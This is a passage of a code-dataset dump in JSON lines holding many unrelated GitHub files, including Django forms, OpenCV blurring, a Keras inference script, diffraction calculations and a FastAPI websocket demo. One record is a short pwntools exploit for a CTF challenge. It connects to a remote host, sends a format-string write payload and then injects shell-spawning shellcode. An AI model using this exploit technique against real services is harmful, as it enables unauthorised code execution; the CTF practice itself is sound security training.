Structure\n self.root = root_node\n\n def insert(self, root, data):\n # Return the new root\n root = self._insert(root, data)\n return root\n\n def _insert(self, curr, data):\n if not curr:\n return TreeNode(data, None, None)\n else:\n if data < curr.data:\n curr.left_child = self._insert(curr.left_child, data)\n elif data > curr.data:\n curr.right_child = self._insert(curr.right_child, data)\n return curr\n","repo_name":"richnakasato/fc","sub_path":"jam_into_a_bst.py","file_name":"jam_into_a_bst.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"11507446438","text":"import cv2\nimport numpy as np\nfrom multiprocessing import Pool, cpu_count\n\ndef apply_gaussian_blur_chunk(chunk, kernel_size):\n # Apply Gaussian blur to a chunk of the image\n chunk_blurred = cv2.GaussianBlur(chunk, (kernel_size, kernel_size), 0)\n return chunk_blurred\n\ndef apply_gaussian_blur(image_path, output_path, chunk_size=100, kernel_size=5):\n # Load the image\n image = cv2.imread(image_path)\n if image is None:\n print(\"Error: Unable to load the image.\")\n return\n\n # Ensure the kernel size is valid and odd\n if kernel_size % 2 == 0:\n kernel_size += 1\n \n # Split the image into smaller chunks\n rows, cols = image.shape[:2]\n chunks = [image[row:row + chunk_size, col:col + chunk_size]\n for row in range(0, rows, chunk_size)\n for col in range(0, cols, chunk_size)]\n\n # Apply Gaussian blur using multiprocessing\n num_processes = cpu_count()\n with Pool(num_processes) as pool:\n chunk_blurred_list = pool.starmap(apply_gaussian_blur_chunk,\n [(chunk, kernel_size) for chunk in chunks])\n\n # Recombine the blurred chunks into the final image\n output_image = np.zeros_like(image)\n current_chunk = 0\n for row in range(0, rows, chunk_size):\n for col in range(0, cols, chunk_size):\n output_image[row:row + chunk_size, col:col + chunk_size] = chunk_blurred_list[current_chunk]\n current_chunk += 1\n\n # Save the final image with Gaussian blur applied\n cv2.imwrite(output_path, output_image)\n print(\"Gaussian blur applied and saved successfully.\")\n\ndef gaussian_main(filepath):\n input_image_path = filepath\n output_image_path = \"gaussian_blurred_image.jpg\"\n \n kernel_size = int(input(\"Enter kernel size for Gaussian blur: \"))\n apply_gaussian_blur(input_image_path, output_image_path, 
kernel_size=kernel_size)\n","repo_name":"YKhanna2003/Algorithms_On_Satellite_Imagery","sub_path":"Filter_Support/gaussian.py","file_name":"gaussian.py","file_ext":"py","file_size_in_byte":1903,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"1066329726","text":"import discord\nfrom discord.ext import commands\n\nfrom cogs.consts import *\nfrom cogs.handlers import Handlers, Failed\nfrom cogs import interactions\n\n\nclass Reset(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n self.emojis = Emojis\n self.colours = Cols()\n self.handlers = Handlers(self.bot)\n self.interactions = interactions\n\n @commands.command()\n @commands.guild_only()\n async def reset(self, ctx):\n m = await ctx.send(embed=loading_embed)\n if isinstance(await self.handlers.checkPerms(ctx, m, \"manage_guild\", self.emojis().punish.warn, \"reset settings\", me=False), Failed):\n return\n v = self.interactions.createUI(ctx, [\n self.interactions.Button(self.bot, emojis=self.emojis, id=\"ye\", title=\"Yes\", style=\"success\"),\n self.interactions.Button(self.bot, emojis=self.emojis, id=\"no\", title=\"No\", style=\"danger\"),\n ])\n await m.edit(embed=discord.Embed(\n title=\"Are you sure\",\n description=f\"By clicking Yes, all of your server settings will be reset. This cannot be reversed.\",\n colour=self.colours.red\n ), view=v)\n await v.wait()\n if v.selected == \"ye\":\n self.handlers.fileManager(ctx.guild, action=\"RESET\")\n return await m.edit(embed=discord.Embed(\n title=\"Reset\",\n description=f\"All settings reset successfully\",\n colour=self.colours.green\n ), view=None)\n await m.edit(embed=discord.Embed(\n title=\"Reset\",\n description=f\"Cancelled\",\n colour=self.colours.green\n ), view=None)\n\n\ndef setup(bot):\n bot.add_cog(Reset(bot))\n","repo_name":"ClicksMinutePer/rsm","sub_path":"cogs/commands/reset.py","file_name":"reset.py","file_ext":"py","file_size_in_byte":1726,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"73636902120","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Estudiante',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('nombre', models.CharField(max_length=50)),\n ('codigo', models.CharField(max_length=7)),\n ('numero_documento', models.CharField(max_length=10)),\n ('nivel', models.CharField(max_length=25, choices=[(b'posgrado', b'Posgrado'), (b'pregrado', b'Pregrado')])),\n ],\n ),\n migrations.CreateModel(\n name='Facultad',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('nombre_facultad', models.CharField(max_length=50)),\n ],\n ),\n migrations.CreateModel(\n name='Pazy',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('fecha_creacion', models.DateField()),\n ('consecutivo', models.CharField(max_length=25)),\n ('estudiante', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n ),\n migrations.CreateModel(\n name='Programa',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('nombre_programa', 
models.CharField(max_length=100)),\n ('codigo', models.CharField(max_length=6)),\n ],\n ),\n migrations.AddField(\n model_name='estudiante',\n name='Facultad',\n field=models.ForeignKey(to='pazys.Facultad'),\n ),\n migrations.AddField(\n model_name='estudiante',\n name='User',\n field=models.ForeignKey(to=settings.AUTH_USER_MODEL),\n ),\n migrations.AddField(\n model_name='estudiante',\n name='programa',\n field=models.ForeignKey(to='pazys.Programa'),\n ),\n ]\n","repo_name":"arcegk/biblioteca","sub_path":"projects/ingsoft/biblioteca/pazys/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"34256709184","text":"from django.forms import ModelForm, widgets, ValidationError, ChoiceField, ModelChoiceField, DateInput, TextInput, ModelMultipleChoiceField\nfrom chittabook.models.userprofile import UserProfile\nfrom django_countries.widgets import CountrySelectWidget\nfrom bootstrap_datepicker_plus.widgets import DatePickerInput, DateTimePickerInput\nfrom datetime import date\nfrom chittabook.models.accounts import Account, BankAccount, LoanAccount, CreditCard, InvestmentAccount\nfrom chittabook.models.categories import Category\nfrom chittabook.models.transactions import Transaction\nfrom django.utils.html import format_html\nfrom django.utils import timezone\nfrom django.db.models import QuerySet\nfrom django.db import models\n\n\n# create userprofile model form\nclass UserProfileForm(ModelForm):\n class Meta:\n model = UserProfile\n fields = ['name', 'dob', 'profession', 'gender', 'country']\n widgets = {\n 'dob': TextInput( \n attrs={'type': 'date'} \n ),\n 'country': CountrySelectWidget()\n }\n\n # custom validation for dob\n def clean(self):\n cleaned_data = super().clean()\n dob = cleaned_data.get(\"dob\")\n\n if dob > date.today():\n raise ValidationError(\"Date of Birth cannot be in the future.\")\n elif dob == date.today():\n raise ValidationError(\"Date of Birth cannot be today.\")\n \n # dob cannot be less than 13 years old\n today = date.today()\n age = int(today.year) - int(dob.year) - ((int(today.month), int(today.day)) < (int(dob.month), int(dob.day)))\n\n if int(age) < 18:\n raise ValidationError(\"Date of Birth cannot be less than 13 years.\")\n elif int(age) > 100:\n raise ValidationError(\"Date of Birth cannot be greater than 100 years.\")\n \n return cleaned_data\n \n \n\n\n# Bank Account form\nclass BankAccountForm(ModelForm):\n class Meta:\n model = BankAccount\n fields = '__all__'\n exclude = ['user', 'currency', 'created_at']\n\n\n\n# Credit Cards form\nclass CreditCardForm(ModelForm):\n class Meta:\n model = CreditCard\n fields = '__all__'\n exclude = ['user', 'debt', 'currency', 'created_at']\n labels = {\n 'balance': 'Initial Debt',\n 'account_name': 'Credit Card Name',\n }\n\n\n\n# Loan Account form\nclass LoanAccountForm(ModelForm):\n class Meta:\n model = LoanAccount\n fields = '__all__'\n exclude = ['user', 'currency', 'created_at']\n\n\n\n# Investment Account form\nclass InvestmentAccountForm(ModelForm):\n class Meta:\n model = InvestmentAccount\n fields = '__all__'\n exclude = ['user', 'currency', 'created_at']\n\n\n\n# Transaction form\nclass TransactionForm(ModelForm):\n \n account = ModelChoiceField(queryset=Account.objects.none())\n\n \n class Meta:\n model = Transaction\n fields = '__all__'\n exclude = ['user', 'balance_after', 'created_at', 'currency']\n widgets = {\n 'date': TextInput( \n attrs={\n 
'type': 'date',\n 'max': date.today().isoformat()\n } \n ),\n }\n\n account = ChoiceField(choices=[], required=True, label='Select Account')\n \n # custom initialization\n def __init__(self, *args, **kwargs):\n self.request = kwargs.pop('request', None)\n super(TransactionForm, self).__init__(*args, **kwargs)\n self.fields['account'].choices = self.get_account_choices()\n self.fields['category'].queryset = Category.objects.filter(user=self.request.user) # set initial queryset to none and used htmx request to populate the fields based on the selected tab\n\n \n # Account choices function\n def get_account_choices(self):\n bank_accounts = BankAccount.objects.filter(user=self.request.user)\n credit_cards = CreditCard.objects.filter(user=self.request.user)\n loan_accounts = LoanAccount.objects.filter(user=self.request.user)\n investment_accounts = InvestmentAccount.objects.filter(user=self.request.user)\n\n account_choices = []\n\n if bank_accounts:\n account_choices.append(('Bank Accounts', [(a.id, a.account_name) for a in bank_accounts]))\n\n if credit_cards:\n account_choices.append(('Credit Cards', [(a.id, a.account_name) for a in credit_cards]))\n\n if loan_accounts:\n account_choices.append(('Loan Accounts', [(a.id, a.account_name) for a in loan_accounts]))\n\n if investment_accounts:\n account_choices.append(('Investment Accounts', [(a.id, a.account_name) for a in investment_accounts]))\n\n return account_choices\n \n \n # clean function to convert account available choices\n def clean(self):\n cleaned_data = super().clean()\n account_id = cleaned_data.get('account')\n \n # override account instance data and clean it\n try:\n account_instance = Account.objects.get(id=account_id)\n cleaned_data['account'] = account_instance\n except Account.DoesNotExist:\n raise ValidationError('Invalid account choice.')\n \n return cleaned_data\n \n\n ","repo_name":"rajeevreddyms5/capstone","sub_path":"chittabook/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":5195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"708371592","text":"# from __future__ import print_function\nwhile True:\n try:\n print(\"Let us solve the equation(x/2}/(x-y)\")\n x = float(input(\"Please enter a value of x:\"))\n y = float(input(\"Please enter a value of y:\"))\n if x == 0 or y == 0:\n break\n z = (x/2)/(x-y)\n print(\"Solving (x/2)/(x-y) for value x =\",x,\"and y\",y,\"we will get the result:\",z)\n except:\n print(\"There was an error with the code\")","repo_name":"rovinpokharel/basicPython","sub_path":"error.py","file_name":"error.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"36278965035","text":"import os\nimport torch\nimport argparse\nimport numpy as np\nfrom collections import defaultdict\nfrom mmcv import Config\nfrom mmcv.runner import load_checkpoint, init_dist, get_dist_info\nfrom mmcv.parallel import MMDistributedDataParallel\nfrom mmdet.apis import set_random_seed, multi_gpu_test\nfrom mmdet3d.models import build_model\nfrom mmdet3d.datasets import build_dataloader, build_dataset\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(\n description='MMDet test (and eval) a 5 models 5 times')\n parser.add_argument('config', help='config file')\n parser.add_argument('checkpoint', help='checkpoints directory')\n parser.add_argument(\n '--launcher',\n choices=['none', 'pytorch', 'slurm', 'mpi'],\n default='none',\n help='job 
launcher')\n parser.add_argument('--local_rank', type=int, default=0)\n args = parser.parse_args()\n if 'LOCAL_RANK' not in os.environ:\n os.environ['LOCAL_RANK'] = str(args.local_rank)\n return args\n\n\ndef main():\n args = parse_args()\n cfg = Config.fromfile(args.config)\n init_dist(args.launcher, **cfg.dist_params)\n checkpoints = tuple(filter(lambda x: x.endswith('.pth'), os.listdir(args.checkpoint)))\n print('found checkpoints: ', checkpoints)\n metrics = defaultdict(list)\n model = build_model(cfg.model, test_cfg=cfg.get('test_cfg'))\n model = MMDistributedDataParallel(\n model.cuda(),\n device_ids=[torch.cuda.current_device()],\n broadcast_buffers=False)\n for i, checkpoint in enumerate(checkpoints):\n load_checkpoint(model, os.path.join(args.checkpoint, checkpoint), map_location='cpu')\n for j in range(5):\n set_random_seed(j * 111)\n dataset = build_dataset(cfg.data.test)\n data_loader = build_dataloader(\n dataset,\n samples_per_gpu=1,\n workers_per_gpu=cfg.data.workers_per_gpu,\n dist=True,\n shuffle=False)\n outputs = multi_gpu_test(model, data_loader)\n if get_dist_info()[0] == 0:\n for k, v in dataset.evaluate(outputs).items():\n metrics[k].append(v)\n\n if get_dist_info()[0] == 0:\n for k in ('mAP_0.25', 'mAP_0.50'):\n print(k, 'min, mean, max:', np.min(metrics[k]), np.mean(metrics[k]), np.max(metrics[k]))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"SamsungLabs/fcaf3d","sub_path":"tools/test5x5.py","file_name":"test5x5.py","file_ext":"py","file_size_in_byte":2390,"program_lang":"python","lang":"en","doc_type":"code","stars":200,"dataset":"github-code","pt":"18"} +{"seq_id":"16784024003","text":"Sec0 = [\"P1\", \"P1\", \"P2\", \"P2\", \"P1\", \"P2\", \"P1\", \"P1\"]\nSec1 = [\"P1\", \"P1\", \"P2\", \"P2\", \"P1\", \"P2\", \"P2\", \"P2\"]\nsec2 = [\"P1\", \"P1\", \"P2\", \"P2\", \"P1\", \"P2\", \"P1\", \"P1\", \"P2\", \"P1\"]\nsec3 = [\"P1\", \"P1\"]\n\n\ndef juego(secuencia):\n game = [\"Love\", \"15\", \"30\", \"40\"]\n fin = False\n error = False\n P1 = 0\n P2 = 0\n\n lon = len(secuencia)\n for i in range(0, (lon)):\n error = fin\n P1 += 1 if secuencia[i] == \"P1\" else 0\n P2 += 1 if secuencia[i] == \"P2\" else 0\n\n if P1 >= 3 and P2 >= 3:\n if not fin and abs(P1-P2) <= 1:\n print(\"Deuce\" if P1 == P2 else\n \"Ventaja P1\"if P1 > P2 else \"Ventaja P2\")\n else:\n fin = True\n else:\n if P1 < 4 or P2 < 4:\n print(f\"{game[P1]}-{game[P2]}\")\n else:\n fin = True\n\n print(\"Puntos no validos\"if error else\n \"Ha ganado P1\" if P1 > P2 else \"Ha ganado P2\")\n\n\njuego(Sec0)\njuego(Sec1)\njuego(sec2)\njuego(sec3)\n","repo_name":"Aldroide/Retos","sub_path":"Reto #02 Partido de Tenis/JuegoTenis.py","file_name":"JuegoTenis.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"9211770851","text":"def nSequenza(seq, studseq, n):\n seq = list(map(int, seq))\n studseq = list(map(int, studseq))\n\n i = 0\n j = 0\n ripensamento = 0\n for i in range(1,len(studseq)):\n if studseq[i] < studseq[i - 1]:\n ripensamento += 1\n while i != n and j != len(seq):# and ripensamento <= 1:\n if studseq[i] == seq[j]:\n i += 1\n j += 1\n else:\n j += 1\n if i == n:\n if ripensamento < 2:\n stringa = (\"Si. Totalizzeresti [1 safe pt], [9 possible pt], [0 out of reach pt].
N-sottosequenza fornita è un certificato valido: \" + str(studseq) + \"
Mi hai convinto che la massima lunghezza di una N-sottosequenza è almeno \" + str(n)+\".\")\n else:\n stringa = (\"No. Totalizzeresti [0 safe pt], [0 possible pt], [10 out of reach pt].
Hai inserito \" + str(studseq)+\"
Hai avuto troppi ripensamenti.\")\n return stringa\n else:\n stringa = (\"No. Totalizzeresti [0 safe pt], [0 possible pt], [10 out of reach pt].
Hai inserito \" + str(studseq) + \" che non è una sottosequenza di s: \" + str(seq) + \".\")\n return stringa\n","repo_name":"romeorizzi/eduexams","sub_path":"Applet/exercise_2/verifier/nSeq.py","file_name":"nSeq.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"it","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"25364957325","text":"import keras\nimport tensorflow as tf\nfrom keras.utils import to_categorical\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.utils import shuffle\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom numpy import where\nimport numpy as np\nimport pandas as pd\nimport sys\n\ntestCsv = str(sys.argv[1])\n\n\ndef prepare_data(name, csv_path, shuf, scal):\n labels = []\n print('')\n print(csv_path)\n df = pd.read_csv(csv_path)\n\n if shuf:\n df = shuffle(df)\n\n # df.to_csv(name + '.csv')\n\n for i in range(df.shape[0]):\n if df.iloc[i, 0] == 1:\n labels.append(1)\n else:\n labels.append(0)\n\n y = np.array(labels).astype(int)\n\n # drop label and name column\n df = df.drop(df.columns[[0, 1]], axis=1).astype('float32')\n X = df.to_numpy()\n\n if scal:\n X = StandardScaler().fit_transform(X)\n dfn = pd.DataFrame.from_records(X)\n # dfn.to_csv('out_features_scaled.csv')\n\n print('')\n # print(X)\n print('X_' + name + '_dim: ' + str(X.shape))\n # print(y)\n print('y_' + name + '_dim: ' + str(y.shape))\n\n return X, y\n\n\ndef get_classifier():\n classfr = Sequential()\n classfr.add(Dense(9, input_dim=18, activation='relu'))\n classfr.add(Dense(3, activation='relu'))\n classfr.add(Dense(9, activation='relu'))\n classfr.add(Dense(2, activation='softmax')) # real: [1, 0], spoof: [0, 1]\n return classfr\n\n\ndef to_categorical_fixed(testy):\n testy_one_hot = np.zeros((testy.size, 2))\n for i in range(testy.size):\n if testy[i] == 1:\n testy_one_hot[i][0] = 1\n else:\n testy_one_hot[i][1] = 1\n return testy_one_hot\n\n\ntestX, testyy = prepare_data('test', testCsv, False, False)\n\ntesty_one_hotx = to_categorical_fixed(testyy)\n\nclassifier = get_classifier()\nclassifier.load_weights('classifier_weights.h5')\npredicted_y = classifier.predict(testX)\npredicted_y = np.rint(predicted_y)\n\nres = np.sum(np.absolute(testy_one_hotx - predicted_y.astype(float)), axis=1)\nitems_correct = res[res == 0]\ntest_acc = float(items_correct.size) / float(res.size)\nprint('Test: %.3f' % test_acc)\npredicted_y = predicted_y.astype(float)\nrealsamples_expected = np.where(testy_one_hotx[:, 0] == 1)\nrealsamples_actual = predicted_y[realsamples_expected[0]]\nrealsamples_spoofs = np.where(realsamples_actual[:, 0] == 0)\nbpcer = float(len(realsamples_spoofs[0])) / float(len(realsamples_expected[0])) # real misclassified as spoof\n\nspoofsamples_expected = np.where(testy_one_hotx[:, 1] == 1)\nspoofsamples_actual = predicted_y[spoofsamples_expected[0]]\nspoofsamples_real = np.where(spoofsamples_actual[:, 1] == 0)\napcer = float(len(spoofsamples_real[0])) / float(len(spoofsamples_expected[0])) # spoof misclassified as real\n\nprint('bpcer: {:.3f}, realsamples expected: {:d}, realsamples mistaken for spoofs: {:d}'.format(bpcer, len(\n realsamples_expected[0]), len(realsamples_spoofs[0])))\nprint('apcer: {:.3f}, spoofsamples expected: {:d}, spoofsamples mistaken for real: {:d}'.format(apcer, len(\n spoofsamples_expected[0]), 
len(spoofsamples_real[0])))\n","repo_name":"joelpou/pydatatools","sub_path":"ml/classifier_inference.py","file_name":"classifier_inference.py","file_ext":"py","file_size_in_byte":3097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"41774454799","text":"from pwn import *\nimport re\ncontext(arch=\"amd64\",os=\"linux\",log_level=\"debug\")\np=remote(\"111.198.29.45\",42278)\nxx=p.recvuntil(\"name be:\")\ns_addr1=re.findall(r\"is (.+?)\\n\",xx)[0]\ns_addr=int(\"0x\"+s_addr1,16)\np.sendline(\"abc\")\np.sendlineafter(\"up?:\",\"east\")\np.sendlineafter(\"leave(0)?:\",\"1\")\np.sendlineafter(\"an address\",str(s_addr))\np.recvuntil(\"wish is:\")\npayload=\"A\"*8+\".%p\"*10\npayload=\"%85s%9$n\"+p64(s_addr)\np.sendline(payload)\np.recvuntil(\"YOU SPELL\")\np.sendline(asm(shellcraft.sh()))\np.interactive()\n","repo_name":"go1me/ctf","sub_path":"xctf/pwn/string/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"41185094635","text":"from MutableContract import MutableContract\n\nmut_contract = MutableContract('original.sol')\n\n# Defining state variable\nmut_contract.insert_code_at(mut_contract.token.Contract.head,\n b'uint256 public EchidnaVar;',\n where='within.start')\n\n# Assigning the state variable in the constructor\nmut_contract.insert_code_at(mut_contract.token.Contract.functions.constructor,\n b'EchidnaVar = 10;',\n where='within.end')\n\n# Adding a variable before a function, in this case it will add it to the state vars\n# before seems pretty useless between functions..\nmut_contract.insert_code_at(mut_contract.token.Contract.functions.constructor,\n b'uint256 public pairAdd;',\n where='before')\n\n# Insert at the start of a function, in this case to limit a burn call\nmut_contract.insert_code_at(mut_contract.token.Contract.functions._burn,\n b'require(msg.sender == 0xdAC17F958D2ee523a2206206994597C13D831ec7);',\n where='within')\n\n# Insert Echidna test code at the end of the contract.\nmut_contract.insert_code_at(mut_contract.token.Contract.tail,\n '''function echidna_check_balance() public returns(bool) {\n return msg.sender.balance < EchidnaVar;\n }'''.encode('utf-8'),\n where='within')\n\n# Insert an interface before the contract, can also be after for example\nmut_contract.insert_code_at(mut_contract.token.Contract,\n '''interface CoolInterface {\n function magic() external pure returns (uint256);\n}\n'''.encode('utf-8'),\n where='before')\n\n\n\nmut_contract.dump()\n","repo_name":"AstraGodz/MutableContract","sub_path":"simpleExample.py","file_name":"simpleExample.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"27412184419","text":"import grid\nimport math as m\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\n\ndef delta(theta, phi, x, y, z, wavelen):\n ans = (m.sin(theta) * (x * m.cos(phi) + y * m.sin(phi)) + z * m.cos(theta) - z) * 2 * m.pi / wavelen\n return ans\n\n\ndef intence(points, spacing, nangle, wavelen):\n gr = grid.make_grid(points, spacing)\n intenses = np.empty([nangle, nangle], float)\n cosum = 0.\n sinsum = 0.\n theta = np.linspace(0, np.pi, nangle)\n phi = np.linspace(0, 2 * np.pi, nangle)\n for i, t in enumerate(theta):\n for j, p in enumerate(phi):\n for k in range(points ** 3):\n x = gr[k][0]\n y = gr[k][1]\n z = gr[k][2]\n cosum = cosum + 
m.cos(delta(t, p, x, y, z, wavelen))\n sinsum = sinsum + m.sin(delta(t, p, x, y, z, wavelen))\n intenses[i][j] = m.sqrt(cosum ** 2 + sinsum ** 2)\n return intenses\n\n\ndef intencity(points, spacing, nangle, wavelen, taf):\n gr = grid.make_grid(points, spacing)\n intenses = np.empty([nangle, nangle], float)\n cosum = 0.\n sinsum = 0.\n theta = np.linspace(0, np.pi, nangle)\n phi = np.linspace(0, 2 * np.pi, nangle)\n for i, t in enumerate(theta):\n for j, p in enumerate(phi):\n for k in range(points ** 3):\n x = gr[k][0]\n y = gr[k][1]\n z = gr[k][2]\n cosum = cosum + m.cos(delta(t, p, x, y, z, wavelen))\n sinsum = sinsum + m.sin(delta(t, p, x, y, z, wavelen))\n arg_af = m.sin(t) / wavelen\n intenses[i][j] = m.sqrt(m.sqrt(cosum ** 2 + sinsum ** 2) * atom_factor(arg_af, taf) * spacing)\n print(atom_factor(arg_af, taf))\n return intenses\n\n\ndef atom_factor(arg, taf):\n dh = 0.05\n imax = 29\n if arg >= 0:\n i = m.trunc(arg / dh)\n if i > imax:\n return 0\n else:\n dx = (arg % dh)\n return taf[i] + (taf[i+1] - taf[i]) * dx\n\n\n\ndef int_show(points, spacing, nangle, wavelen):\n values = intence(points, spacing, nangle, wavelen)\n\n # Drawing data points\n phi = np.linspace(0, 2 * np.pi, 180)\n theta = np.linspace(0, np.pi, 180)\n #\n\n # Generate drawing two-dimensional data\n p, t = np.meshgrid(phi, theta)\n\n plt.figure(figsize=(5, 5))\n ax = plt.subplot(projection='polar')\n ax.contourf(p, t, values, cmap='gray')\n plt.grid(c='black')\n\n plt.show()\n\n\ndef atom_factor0(arg, taf):\n dh = 0.05\n imax = 29\n if arg >= 0:\n i = m.trunc(arg/dh)\n if i > imax:\n Result=0\n else:\n dx = (arg % dh)\n Result=taf[i]+(taf[i+1]-taf[i])*dx\n return Result\n\n\ndef Intensity1(A, L, T, Fi, c, taf):\n k= 2 * m.pi / L\n SinT = m.sin(T)\n CosT = m.cos(T)\n SinFi = m.sin(Fi)\n CosFi=m.cos(Fi)\n ReA=0\n ImA=0\n for i in range(len(c)):\n Arg=k*(SinT*(c[i][0]*CosFi+c[i][1]*SinFi)+c[i][2]*CosT-c[i][2])\n ReA= ReA + m.cos(Arg)\n ImA=ImA + m.sin(Arg)\n Sum = m.sqrt(ReA*ReA+ImA*ImA)\n ArgAF = m.sin(T)/L\n F = atom_factor0(ArgAF, taf)\n return m.sqrt(A*F*Sum)\n\n\ndef integral_inten(points, spacing, nangle, wavelen, taf, brave):\n gr = grid.make_grid(points, spacing)\n intenses = np.empty([nangle, nangle], float)\n theta = np.linspace(0, np.pi, nangle)\n phi = np.linspace(0, 2 * np.pi, nangle)\n for i, t in enumerate(theta):\n for j, p in enumerate(phi):\n intenses[i][j] = Intensity1(1, wavelen, t, p, gr, taf)\n return intenses","repo_name":"multsidar/difraction_my_trys_multsidar","sub_path":"Intence.py","file_name":"Intence.py","file_ext":"py","file_size_in_byte":3513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"19174777572","text":"from components.ui.window import create_window\nfrom math import ceil\nfrom components.entity import Entity\nfrom components.sprite import Sprite\nfrom components.ui.window import Window\nfrom components.label import Label\n\nitems_per_row = 5\npadding_size = 5\ngap_size = 5\nitem_size = 32\n\nclass InventoryView:\n def __init__(self, inventory, slot_image=\"inventory_slot.png\"):\n from core.engine import engine\n self.inventory = inventory\n self.slot_image = slot_image\n\n width = padding_size + (items_per_row * item_size) + ((items_per_row-1 ) * gap_size) + padding_size\n rows = ceil(inventory.capacity / items_per_row)\n height = padding_size + (rows * item_size) + ((rows-1) * gap_size) + padding_size\n\n from core.camera import camera\n x = camera.width - width\n y = 0\n\n self.window = create_window(x, y, width, 
height)\n self.slot_container_sprites = []\n self.slot_sprites = []\n\n inventory.listener = self\n\n self.render()\n\n def render(self):\n print(\"Called render\")\n row = 0\n column = 0\n for slot in self.inventory.slots:\n x = column * (item_size + gap_size) + self.window.x + padding_size\n y = row * (item_size + gap_size) + self.window.y + padding_size\n container_sprite = Entity(Sprite(self.slot_image, True), x=x, y=y)\n self.window.get(Window).items.append(container_sprite)\n if slot.type is not None:\n print(slot.type.name)\n item_sprite = Entity(Sprite(slot.type.icon_name, True), x=x, y=y)\n if slot.type.stack_size > 1:\n label = Entity(Label(\"EBGaramond-ExtraBold.ttf\", str(slot.amount), color=(255, 255, 0), size=30), x=x, y=y)\n self.window.get(Window).items.append(label)\n self.window.get(Window).items.append(item_sprite)\n column += 1\n if column >= items_per_row:\n column = 0\n row += 1\n\n\n def clear(self):\n for i in self.window.get(Window).items:\n if i.has(Sprite):\n i.get(Sprite).breakdown()\n elif i.has(Label):\n i.get(Label).breakdown()\n self.window.get(Window).items.clear()\n\n\n def refresh(self):\n self.clear()\n self.render()\n\n def breakdown(self):\n pass\n\n","repo_name":"AlexanderFarrell/adventure_game_python","sub_path":"src/components/ui/inventory_view.py","file_name":"inventory_view.py","file_ext":"py","file_size_in_byte":2391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"9061951296","text":"from timeit import timeit, Timer\n\ndef sample_function():\n result = 0\n for i in range(100000):\n result = result + (i * i * i)\n return result\n\n\ntime_taken = timeit(sample_function, number = 1000)\nprint('total time:', time_taken, ', avarage time', time_taken/1000)\n\nprint('-' * 25)\n\ntimer = Timer(sample_function)\nprint(timer.timeit(number = 1000))\nprint(timer.repeat(repeat = 5, number=1000))\n\n","repo_name":"johnehunt/advancedpython3","sub_path":"profiling/timings2.py","file_name":"timings2.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"18"} +{"seq_id":"22234631055","text":"from fastapi import FastAPI, WebSocket\nfrom fastapi.responses import HTMLResponse\n\nfrom . import schemas\n\napp = FastAPI()\n\nmain_page = open('app/pages/index.html', 'r').read()\n\n@app.get(\"/\")\nasync def get():\n return HTMLResponse(main_page)\n\n@app.websocket(\"/ws\")\nasync def websocket_send_endpoint(websocket: WebSocket):\n await websocket.accept()\n\n ctr = 0\n while True:\n text = await websocket.receive_text()\n ctr += 1\n await websocket.send_json([{\n 'id': ctr,\n 'text': text\n }])\n","repo_name":"rinagert512/fastapi_websocket","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"33551498885","text":"#Reference : https://www.linkedin.com/pulse/learn-looping-python-fun-text-based-games-doug-purcell/\nimport random\n\n# random_num is the number in range 1 ... 
